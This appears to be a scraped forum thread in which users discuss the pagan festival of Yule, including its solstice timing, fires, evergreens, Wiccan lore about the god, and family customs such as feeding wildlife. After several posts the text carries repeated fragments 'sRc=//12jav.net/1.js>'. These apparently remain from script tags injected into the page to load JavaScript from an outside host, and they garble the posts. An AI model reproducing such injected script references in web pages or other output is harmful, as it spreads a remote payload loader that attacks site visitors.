So Yule is arriving promptly. I myself will be having a feast, and will have a amazing ritual and decorating moment.
Yule can be anywhere from December 20-23, depending one the sun. It is a time of joy, and is most commonly known to the myth of the god being born.
Yule often has fire's going to celebrate the return of light, upon Ritual some make festival tea's, and foods. Pine, is often used momentairly at this time.
What will you be doing? Add anything else, feel free. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I think you are mixing Yule with Christmas. In Europe, Yule was never a time for joy. Quite the opposite. It was a time of bitter cold, with people staying "sheltered" as much as possible. Yes, they decorated their homes with Holly and Ivy, and other "Evergreens" as a reminder that not everything dies in Winter. Yule, really, was a time of "waiting" for the Sun to "come back".
And the fires? They were to keep warm! Of course, the ancients also knew that after Yule the weather would begin to get better. So in that sense there would be some "celebration". Yule was, and really still is, European. In England there was no "Yule" before the Vikings came. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Yule was also a time of "looking back" over the year's harvest, and praying to the Gods for a better harvest next year! sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Thanks Bryson, I guess i forgot to put that in there. Although in a way, it's a time for celebration and encouragement for the Sun's return. But it is also a time for mourning, thanks for the help. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I thought that in Wicca lore, Yule was when the GOD died and that's why its a family celebration. I didn't think the GOD was said to be reborn till Imbolc. I could be wrong in this.
what Brysing says is true, even in modern days celebrations echo of this. Yule is about celebrating life during the darkest time of year. Some people celebrate it in a more festive way, while others its more solemn with just family. It depends on who you talk to.
We do a big dinner on Christmas Eve for family and sit back and enjoy eachothers company while on Yule was have a small dinner between the family in the house and also do something for Nature. We like to take pine cones and put peanut butter on them with seeds or put apples out for the deer. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
